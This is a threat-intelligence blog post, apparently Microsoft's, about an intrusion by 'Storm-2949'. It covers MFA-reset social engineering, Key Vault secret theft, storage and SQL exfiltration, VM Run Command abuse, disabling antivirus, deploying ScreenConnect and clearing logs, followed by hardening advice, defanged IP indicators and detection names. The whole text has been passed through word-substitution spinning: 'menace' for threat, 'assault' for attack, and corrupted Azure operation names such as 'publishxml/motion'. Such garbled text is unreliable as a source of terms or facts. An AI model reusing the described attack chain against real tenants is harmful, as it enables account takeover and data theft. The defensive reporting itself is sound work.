Microsoft Menace Intelligence lately uncovered a methodical, refined, and multi-layered assault, the place a menace actor we observe as Storm-2949 launched a relentless marketing campaign with a singular focus: to exfiltrate as a lot delicate information from a goal group’s high-value property as doable. The assault exfiltrated information from Microsoft 365 purposes, file-hosting companies, and Azure-hosted manufacturing environments, the place the group’s manufacturing utility ecosystem resides.
What started as a focused identification compromise quickly developed right into a full-spectrum assault on the group’s cloud infrastructure. The assault spanned numerous Azure sources, with emphasis on software-as-a-service (SaaS), platform-as-a-service (PaaS), and infrastructure-as-a-service (IaaS) layers.
Storm-2949 didn’t depend on conventional malware and different on-premises techniques, methods, and procedures (TTPs). As an alternative, they leveraged authentic cloud and Azure administration options to realize control-plane and data-plane entry, which they then used to execute code remotely on VMs, and entry delicate cloud sources akin to Key Vaults and storage accounts, amongst others. These actions allowed them to maneuver laterally throughout cloud and endpoint environments whereas mixing into anticipated administrative habits.
As organizations proceed to undertake cloud infrastructure at scale, menace actors are more and more concentrating on identification and management airplane entry quite than particular person gadgets. When cloud identities are compromised, authentic administrative options can be utilized to realize outcomes just like conventional lateral motion, typically with fewer indicators of compromise. Habits-based detections throughout endpoints, cloud environments, and identities—akin to these supplied by Microsoft Defender—may also help groups establish and correlate these actions.
On this weblog, we unpack the complete assault chain from preliminary entry to cloud and endpoint takeover. We then supply actionable insights into how organizations can detect, comprise, and stop comparable identity-driven threats of their environments.
Assault chain overview
The marketing campaign that Storm-2949 deployed may be divided into two phases: focused identification compromise and cloud infrastructure compromise. We talk about every of those phases intimately within the succeeding sections.
Cloud compromise: Microsoft Entra ID and Microsoft 365
On this section, the menace actor focused particular customers via social engineering to acquire their Microsoft Entra ID credentials. Utilizing these credentials, the menace actor then proceeded to exfiltrate information from Microsoft 365 purposes.
Preliminary entry and persistence via focused social engineering and SSPR abuse
We assess with excessive confidence that Storm-2949 leveraged a social engineering method in step with identified abuses of Microsoft’s Self-Service Password Reset (SSPR) course of. In such assaults, a menace actor initiates the SSPR course of on behalf of a focused consumer and subsequently employs social engineering techniques to influence the consumer to finish multifactor authentication (MFA) prompts that seem like authentic.
For instance, the menace actor may impersonate an inside data know-how (IT) help consultant and speak to the consumer claiming that their account requires pressing verification, instructing them to approve MFA prompts as a part of a routine password reset process.
As soon as the consumer approves these prompts, the menace actor is ready to reset the consumer’s password and take away present authentication strategies, akin to telephone numbers, electronic mail addresses, and Microsoft Authenticator registrations, successfully eliminating MFA as a management and enabling unrestricted account entry. Instantly after getting access to the compromised account, the menace actor is then prompted to re-enable MFA and register a brand new authentication methodology. At this stage, the menace actor enrolls Microsoft Authenticator on their very own system, granting themselves persistent entry and stopping the authentic consumer from signing in.
Storm-2949 used an analogous course of repeatedly throughout a number of customers throughout the focused group. The collection of victims, which included IT personnel and senior management, indicated deliberate concentrating on. Based mostly on the roles of the compromised customers and the investigation findings, we assess that the menace actor seemingly used an organized and convincing phishing scheme to lure customers into finishing the fraudulent MFA prompts and thereby compromise their identities.
Listing discovery and persistence
Following the preliminary identification takeover, the menace actor performed listing discovery utilizing Microsoft Graph API. Utilizing a customized Python script, they issued automated API requests to enumerate customers and purposes throughout the tenant. Via these queries, the menace actor searched Microsoft Entra ID for consumer accounts primarily based on identify patterns and position attributes, prone to establish privileged identities and extra excessive‑worth targets.
Determine 2 illustrates the kinds of Graph API queries noticed:
Throughout this assault section, the menace actor additionally tried to ascertain persistence by including credentials to a compromised service principal to allow continued entry unbiased of the compromised consumer accounts. This try failed as a consequence of inadequate permissions. Undeterred, the menace actor continued enumerating service principals and identified utility identifiers, indicating an effort to map utility‑stage entry paths and increase lengthy‑time period footholds throughout the setting.
Utilizing the identical social engineering methods and SSPR abuse described earlier, the menace actor expanded their foothold by compromising three extra cloud consumer accounts.
Microsoft 365 discovery and exfiltration
Storm-2949 leveraged their entry to the compromised consumer accounts to discover and exfiltrate information from the sufferer organizations’ cloud file storage companies. Shortly after acquiring preliminary entry throughout the group, they focused Microsoft 365 purposes, together with OneDrive and SharePoint, figuring out and accessing the group’s delicate information, specializing in IT paperwork regarding digital non-public community (VPN) configurations and distant entry procedures. We assess that this habits displays an try and establish alternatives for lateral motion from a compromised cloud identification into the endpoint community.
The menace actor then launched a large-scale information exfiltration from these storage companies. In a single occasion, Storm-2949 used the OneDrive net interface to obtain 1000’s of information in a single motion to their very own infrastructure. This sample of knowledge theft was repeated throughout all compromised consumer accounts, seemingly as a result of totally different identities had entry to totally different folders and shared directories.
Cloud compromise: Microsoft Azure
Armed with entry to a number of compromised identities – which had been assigned with privileged customized Azure role-based entry management (RBAC) roles on a number of Azure subscriptions – and a rising understanding of the setting, the menace actor shifted focus towards the sufferer’s Azure setting. With a transparent agenda centered on information exfiltration, Storm-2949 demonstrated a relentless drive to uncover and extract essentially the most delicate property throughout the sufferer’s Azure setting, particularly from production-based Azure subscriptions.
Their marketing campaign focused not solely core purposes but in addition the broader ecosystem of interconnected sources akin to Azure App Providers net purposes, Azure Key Vaults, Azure Storage accounts, and SQL databases. These sources collectively energy the group’s cloud-hosted companies. This section marked a transition from identity-centric abuse and SaaS information theft to concentrating on a variety of Azure companies, with an emphasis on each PaaS and IaaS workloads.
Azure App Service and Key Vault compromise
One in all Storm-2949’s foremost targets was a manufacturing Azure App Service net utility that contained delicate information. Following a number of failed makes an attempt to entry this utility, seemingly as a consequence of gateway and community restrictions, Storm-2949 shifted focus to different net apps that gave the impression to be a part of the identical ecosystem. These auxiliary apps, akin to these dealing with authentication or inside APIs, had been individually deployed Azure App Service situations with their very own useful resource identities.
Storm-2949 efficiently compromised a number of of those secondary net apps by benefiting from the consumer’s privileged Azure RBAC permissions and invoking the Azure management-plane operation, microsoft.Internet/websites/publishxml/motion, which retrieves the appliance’s publishing profile. This profile typically accommodates primary authentication credentials for deployment endpoints akin to FTP, Internet Deploy, and the Kudu administration console. Kudu is a built-in administrative interface for Azure App Providers that permits authenticated customers to browse the file system, examine setting variables, and execute instructions throughout the app’s context.
Regardless of efficiently compromising a number of of those auxiliary net apps, Storm-2949 was unable to realize entry to the first manufacturing utility they had been in the end concentrating on. It’s assesed, that the secondary companies, whereas a part of the identical broader ecosystem, didn’t comprise the extent of delicate information or privileged entry the menace actor was searching for. Whereas these footholds supplied visibility into utility configurations and infrastructure, they didn’t ship the high-value property that aligned with the menace actor’s information exfiltration goals. Because of this, the menace actor was pressured to pursue various paths of their effort to achieve the manufacturing net app.
Storm-2949 recalibrated their method and shifted their focus towards backend sources that had been a part of the delicate net app ecosystem and will present stronger leverage. The menace actor pivoted to the group’s Azure Key Vault property – an setting extra prone to centralize delicate secrets and techniques and supply oblique entry to manufacturing methods. A part of the compromised consumer’s Azure RBAC permissions was the privileged Proprietor position over a particular Key Vault that appeared to comprise credentials that will allow the compromise of the manufacturing utility.
Over the span of 4 minutes, the menace actor efficiently manipulated Key Vault entry configurations and accessed dozens of secrets and techniques throughout the stated Key Vault. These secrets and techniques included database connection strings, identification credentials, and extra, dramatically increasing the assault’s blast radius.
Amongst these secrets and techniques, we consider the menace actor discovered credentials that enabled them to entry the appliance they coveted essentially the most, which was the principle manufacturing net app. After they efficiently authenticated into the online app, the menace actor modified its password to retain management. They then started exfiltrating delicate information from it.
Azure Storage and SQL information exfiltration
In parallel, Storm-2949 expanded entry throughout extra cloud sources contained in the ecosystem that contained the online app, together with Azure Storage accounts and an Azure SQL server.
To allow entry to the server, the menace actor abused their present Azure RBAC permissions to control the SQL server firewall guidelines by utilizing the microsoft.sql/servers/firewallrules/write operation. They then linked to the SQL server utilizing the credentials they obtained (together with the online app credentials) from the compromised Key Vault.
The menace actor proceeded with information exfiltration and continued to delete the modified SQL firewall guidelines, which is an exercise in step with protection evasion.
Much like the SQL server compromise, to arrange and put together for enormous information exfiltration from Azure Storage, the menace actor additionally manipulated storage account community entry configurations utilizing the microsoft.storage/storageaccounts/write operation. This manipulation enabled public entry to the storage accounts from a closed set of menace actor-owned IP addresses. As well as, the menace actor abused the Azure management-plane operation microsoft.Storage/storageAccounts/listkeys/motion to entry a number of storage account Shared Entry Signature (SAS) tokens and account keys, enabling the usage of static, non-interactive authentication to retrieve information.
Utilizing these keys, the menace actor downloaded massive volumes of knowledge from a number of Azure Storage accounts utilizing a customized Python script that leveraged the Azure SDK for Storage. The script allowed them to programmatically enumerate and obtain blobs on to their very own endpoint system. This storage‑primarily based exfiltration continued over a number of days for the reason that preliminary entry, with the menace actor alternating between secret- and OAuth‑primarily based authentication as entry circumstances and controls developed.
Azure Digital Machines compromise
Aside from the online app and data-store useful resource compromise, the abuse of Azure Virtual Machine (VM) extensions and administrative options – particularly Run Command and the VMAccess extension – had been additionally outstanding parts of this assault. These actions seem to have been primarily meant to increase operational entry throughout the sufferer setting by leveraging compromised VMs as middleman footholds. Noticed actions throughout these methods targeted on credential harvesting and setting discovery, in addition to makes an attempt to entry sources that weren’t instantly reachable via beforehand compromised identities. These efforts included area reconnaissance and the gathering of authentication materials that might facilitate motion between cloud and on‑premises environments, in addition to allow entry to extra excessive‑worth property.
Shortly after the preliminary entry, the menace actor operated in parallel, attempting to compromise the group’s digital machines. Utilizing the compromised customers assigned with privileged Azure RBAC permissions, the menace actor deployed the VMAccess extension to create a brand new native administrator account on a focused VM. VMAccess is an Azure VM extension meant to assist directors restore entry to a VM when credentials get misplaced or misconfigured by permitting password resets or the addition of privileged native customers via the Azure administration airplane. On this case, the menace actor abused the extension to realize backdoor entry to an administrator consumer on the VM.
Utilizing the Run Command function, the menace actor deployed a script making an attempt to abuse the VM’s managed identification by requesting an entry token from the Azure Occasion Metadata Service (IMDS) and utilizing it to authenticate to – and retrieve secrets and techniques from – the manufacturing net app-related Key Vault. Nevertheless, the menace actor wasn’t capable of retrieve the secrets and techniques as a result of the managed identification lacked the required permissions. But, this try reveals the menace actor utilizing guest-level execution as a bridge to extra Azure useful resource entry via workload identification.
ScreenConnect set up and protection evasion
Storm-2949 additional abused the Run Command by operating a PowerShell script meant to deploy persistent distant entry whereas decreasing host-based safety visibility on a number of VMs.
The script tried to weaken Microsoft Defender Antivirus by disabling a number of protections, together with real-time safety and habits monitoring, and by interfering with its related service. These modifications lowered the probability that subsequent exercise could be blocked or generate actionable alerts on the system.
The script then put in the ScreenConnect distant monitoring and administration (RMM) instrument obtained from menace actor-controlled infrastructure. The set up course of included a number of steps meant to masquerade the instrument’s presence, akin to making the community request seem in step with trusted software program updates and putting information in areas meant to resemble authentic system content material.
To additional obscure the instrument’s presence, the script tried to rename or configure the put in service to resemble authentic Home windows parts, offering a easy type of native masquerading.
Lastly, the script tried cleanup actions to take away native forensic artifacts that could possibly be attributed to the menace actor. These included clearing Home windows occasion logs, eradicating execution artifacts, and deleting command historical past and short-term information. Such steps are generally noticed in post-compromise exercise and are usually meant to complicate investigation quite than present sturdy evasion.
Publish-compromise exercise utilizing ScreenConnect
The menace actor used the deployed ScreenConnect to launch instructions throughout a number of compromised gadgets, performing primary discovery. This included amassing host stage particulars (for instance, working system and configuration data) and enumerating area context akin to consumer accounts and group memberships.
Throughout a subset of these hosts, the menace actor targeted on credential harvesting methods. They found and exfiltrated .pfx certificates information – artifacts that may comprise non-public keys and could possibly be useful for follow-on entry if imported or reused elsewhere. In parallel, they looked for distant file shares for seemingly credential publicity by scanning information for password associated strings. Not each assortment effort occurred on each host; quite, it was distributed throughout methods primarily based on what information and entry every host supplied.
These actions present ScreenConnect getting used as a sensible execution channel to run discovery, accumulate credentials, and try and operationalize entry throughout totally different gadgets.
Whereas the menace actor in the end established execution on a number of endpoints, these methods didn’t seem to yield excessive worth information aligned with their goals. The endpoint exercise primarily served as a secondary functionality for discovery and credential harvesting, quite than a core exfiltration channel.
All through this incident, Microsoft Defender generated a number of alerts that helped analysts piece collectively exercise throughout endpoints and cloud. Defender correlated these indicators into unified incidents, surfacing high-fidelity alerts and a coherent view of menace actor exercise. This type of cross-domain correlation – amassing and normalizing telemetry and linking associated alerts – illustrates the worth of an built-in detection and response method for bettering signal-to-noise readability and end-to-end visibility.
Mitigation and safety steerage
The visibility supplied by correlated alerts throughout identities, cloud, and endpoints may also help organizations examine and perceive assaults end-to-end. Constructing on this visibility, organizations can scale back threat and restrict the influence of comparable assaults by deploying appropriately scoped detection and response capabilities (together with Microsoft Defender the place relevant) and by making use of focused hardening practices.
Guarantee ample safety protection throughout assault surfaces
To successfully detect and reply to assaults that span identification, cloud, and endpoint environments, organizations ought to guarantee they’ve monitoring, detection, and response capabilities deployed and correctly configured throughout these surfaces. The next examples describe how Microsoft Defender capabilities can be utilized to assist with this; equal controls is perhaps accessible in different safety options.
Use Microsoft Defender for Endpoint for:
- Tamper protection enabled to forestall menace actors from stopping safety companies akin to Defender for Endpoint, which may also help forestall hybrid cloud setting assaults.
- Endpoint detection and response (EDR) in block mode in order that Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn’t detect the menace or when Microsoft Defender Antivirus is operating in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts detected post-breach.
- Investigation and remediation in full automated mode to permit Defender for Endpoint to take fast motion on alerts to assist remediate alerts, considerably decreasing alert quantity.
Use Microsoft Defender for Cloud to guard your cloud sources and property from malicious exercise, each in posture administration (Microsoft Defender Cloud Safety Posture Administration), and menace detection capabilities. Allow workload safety capabilities throughout cloud sources, together with:
As well as, leverage the Microsoft Defender XDR to hunt for threats throughout cloud environments and useful resource with advanced hunting. Safety groups can proactively examine menace actor exercise by querying telemetry throughout a number of domains utilizing tables akin to CloudAuditEvents, CloudStorageAggregatedEvents, and others, enabling deep visibility into control-plane and data-plane operations, authentication occasions, and cross-service assault patterns.
Use Microsoft Defender for Cloud Apps and allow connectors to watch SaaS exercise.
Safety hardening and greatest practices
Along with deploying the suitable Defender capabilities, organizations ought to apply the next safety controls and practices to mitigate comparable assault paths:
Identification safety
- Safe accounts with credential hygiene. Observe the principle of least privilege and audit privileged account exercise in your Microsoft Entra ID and Azure environments to gradual or cease menace actors.
- Enable Conditional Access policies. Conditional Entry insurance policies are evaluated and enforced each time the consumer makes an attempt to register. Organizations can defend themselves from assaults that leverage stolen credentials by enabling insurance policies akin to system compliance or trusted IP deal with necessities.
- Ensure MFA is required for all customers. Including extra authentication strategies, such because the Microsoft Authenticator app or a telephone quantity, will increase the extent of safety if one issue is compromised.
- Guarantee phishing-resistant MFA strength is required for Directors and privileged consumer accounts.
- Guarantee all present privileged customers have an already registered MFA methodology to guard in opposition to malicious MFA registrations
- Implement Conditional Access authentication strength to require phishing-resistant authentication for workers and exterior customers for essential apps.
- Consult with Azure Identity Management and access control security best practices for additional steps and proposals to handle, design, and safe cloud setting.
- Activate Microsoft Entra ID protection to watch identity-based dangers and create risk-based Conditional Entry insurance policies to remediate dangerous sign-ins.
Cloud useful resource safety
- Use the Azure Monitor activity log to analyze and monitor Azure administration occasions.
- Configure and harden sources firewall guidelines and entry controls to permit entry solely from trusted IP ranges and digital networks to forestall unauthorized entry.
- Use Azure insurance policies to constantly implement the hardened configurations.
- Observe and apply Azure Storage security greatest practices:
- Use Azure insurance policies for Azure Storage to forestall community and safety misconfigurations and maximize the safety of enterprise information saved in your storage accounts.
- Implement Azure Blob Storage security recommendations for enhanced information safety.
- Use the options available for data protection in Azure Storage.
- Allow immutable storage for Azure Blob Storage to guard from unintended or malicious modification or deletion of blobs or storage accounts.
- Allow Azure Monitor for Azure Blob Storage to gather, combination, and log information to allow recreation of exercise trails for investigation functions when a safety incident happens or community is compromised.
- Use private endpoints for Azure Storage account access to disable public community entry for elevated safety.
- Keep away from utilizing nameless learn entry for blob information.
- Enable Azure blob backup to guard from unintended or malicious deletions of blobs or storage accounts.
- Apply the precept of least privilege when authorizing entry to blob information in Azure Storage utilizing Microsoft Entra and RBAC and configure fine-grained Azure Blob Storage entry for delicate information entry via Azure attribute-based access control (ABAC).
- Observe and apply Azure Key Vault security greatest practices:
- Allow purge protection in Azure Key Vaults to forestall fast, irreversible deletion of vaults and secrets and techniques. Use the default retention interval of 90 days.
- Enable logs in Azure Key Vault and retain them for as much as a 12 months to allow recreation of exercise trails for investigation functions when a safety incident happens or community is compromised.
- Restrict public network access to Azure Key Vault by enabling non-public endpoints and disabling public entry to cut back publicity to unauthorized entry makes an attempt.
- Commonly audit Azure RBAC position assignments and Key Vault entry insurance policies, relying on the Key Vault permission mannequin, to make sure least privilege and detect over-permissioned identities. Microsoft explicitly recommends Azure RBAC over Key Vault entry insurance policies.
- Configure SQL server firewall guidelines to limit entry to identified IP addresses and monitor for unauthorized modifications to firewall configurations.
- Implement authentication through Microsoft Entra ID for SQL situations to cut back reliance on static credentials and enhance entry management
- Observe and apply Azure App Service safety best practices:
- Disable legacy authentication strategies and implement managed identification utilization for Azure App Providers to forestall credential theft via publishing profiles.
- Monitor and limit entry to Azure App Service publishing credentials by limiting RBAC permissions and auditing utilization of the publish profile API.
- Enable diagnostic logging in App Service logs to detect suspicious deployment or configuration modifications.
- Allow Microsoft Azure Backup for digital machines to guard the info in your Microsoft Azure digital machines, and to create restoration factors which can be saved in geo-redundant restoration vaults.
- Audit and limit the usage of Azure VM options and extensions akin to Run Command and VMAccess by limiting RBAC permissions and monitoring for suspicious invocation patterns.
- Use Azure Policy to restrict or audit the deployment of Azure VM extensions throughout your subscriptions.
Normal hygiene suggestions
Indicators of compromise (IOCs)
IOCs mirror observations on the time of research and will not be exhaustive or persistent.
| Indicator | Kind | Description |
| 176.123.4[.]44 | IP deal with | Attacker egressed from this deal with |
| 91.208.197[.]87 | IP deal with | Attacker egressed from this deal with |
| 185.241.208[.]243 | IP deal with | ScreenConnect occasion utilized by Attacker |
Microsoft Defender XDR detections
Microsoft Defender XDR clients can discuss with the checklist of relevant detections beneath. Microsoft Defender XDR coordinates detection, prevention, investigation, and response throughout endpoints, identities, electronic mail, and apps to supply built-in safety in opposition to assaults just like the menace mentioned on this weblog.
Clients with provisioned entry can even use Microsoft Security Copilot in Microsoft Defender to analyze and reply to incidents, hunt for threats, and defend their group with related menace intelligence.
Word that the next detections solely covers the menace actions we’ve noticed on the time of research.
| Tactic | Noticed exercise | Microsoft Defender protection |
| Preliminary entry | – Signal-in exercise from attacker infrastructure to compromised identities
– Signal-in and authentication exercise to Azure sources |
Microsoft Defender XDR – Authentication with compromised credentials – Compromised consumer account in a acknowledged assault sample – Malicious register from a dangerous IP deal with – Malicious register from an IP deal with related to acknowledged attacker infrastructure – Malicious register from acknowledged attacker infrastructure – Malicious sign-in from an uncommon consumer agent – Malicious sign-in from identified menace actor IP deal with – Profitable authentication from a malicious IP – Profitable authentication from a suspicious IP – Profitable authentication utilizing compromised credentials – Person compromised via session cookie hijack – Person signed in from a identified malicious IP Handle – Unattainable Journey Microsoft Defender for Identification Microsoft Defender for Cloud Defender for Databases Defender for Storage |
| Execution | – Varied kinds of execution-related suspicious exercise by an attacker had been noticed | Microsoft Defender XDR – Probably compromised consumer ran a malicious script utilizing an Azure VM extension – Potential hybrid ransomware or hands-on-keyboard assault originating from Azure VM extensions – Hybrid ransomware or hands-on-keyboard assault originating from Azure VM extensions – Azure VM extension exercise adopted by ransomware or hands-on-keyboard assault Microsoft Defender for Cloud Defender for Servers P2 Microsoft Defender for Endpoint |
| Persistence | – Attacker system registered as MFA methodology
– ScreenConnect put in on Azure VMs |
Microsoft Defender for Identification – Suspicious addition of default third‑social gathering MFA methodology to consumer account – Suspicious Entra system be a part of or registration Microsoft Defender for Cloud Apps Microsoft Defender for Endpoint |
| Protection evasion | – Makes an attempt to tamper with Microsoft Defender Antivirus
– Manipulation of Azure Storage account, Key Vault, and SQL database configurations |
Microsoft Defender for Endpoint – Try to show off Microsoft Defender Antivirus safety – Try to clear occasion log – Occasion log was cleared Microsoft Defender for Cloud Defender for Key Vault |
| Credential entry | – Secret extraction from Azure Key Vault
– Tried theft of workload identification tokens utilizing Azure VM Run Command – Credential harvesting from endpoints via ScreenConnect – Publishing Azure App Service net app profile for credential entry – Itemizing Azure storage account entry keys for entry |
Microsoft Defender Antivirus – Trojan:Win32/SuspAdSyncAccess – Backdoor:Win32/AdSyncDump – Habits:Win32/DumpADConnectCreds – Trojan:Win32/SuspAdSyncAccess – Habits:Win32/SuspAdsyncBin Microsoft Defender for Endpoint Microsoft Defender for Cloud Defender for Servers P2 Defender for Key Vault |
| Discovery | – Area and system discovery instructions run on digital machines | Microsoft Defender for Endpoint Suspicious sequence of exploration actions Microsoft Defender for Cloud Apps |
| Lateral motion | – Traversal between cloud sources and purposes | Microsoft Defender for Identification Suspicious sign-in to an internet app following MFA telephone quantity tampering exercise Microsoft Defender for Cloud Apps Microsoft Defender for Cloud |
| Exfiltration | – Information exfiltration from Azure Storage accounts and different sources
– Information exfiltration from file storage companies |
Microsoft Defender XDR Suspicious habits: Mass obtain Microsoft Defender for Cloud Apps Microsoft Defender for Cloud Defender for Storage |
This analysis is supplied by Microsoft Defender Safety Analysis with contributions from Adi Segal, Karam Abu Hanna, Alon Marom, and members of Microsoft Menace Intelligence.
Study extra
For the newest safety analysis from the Microsoft Menace Intelligence neighborhood, try the Microsoft Threat Intelligence Blog.
To get notified about new publications and to hitch discussions on social media, observe us on LinkedIn, X (formerly Twitter), and Bluesky.
To listen to tales and insights from the Microsoft Menace Intelligence neighborhood concerning the ever-evolving menace panorama, hearken to the Microsoft Threat Intelligence podcast.
Evaluate our documentation to be taught extra about our real-time safety capabilities and see how to allow them inside your group.
How Microsoft discovers and mitigates evolving assaults in opposition to AI guardrails
Study extra about securing Copilot Studio agents with Microsoft Defender
Consider your AI readiness with our newest Zero Trust for AI workshop.
Study extra about Protect your agents in real-time during runtime (Preview)
Discover how to build and customize agents with Copilot Studio Agent Builder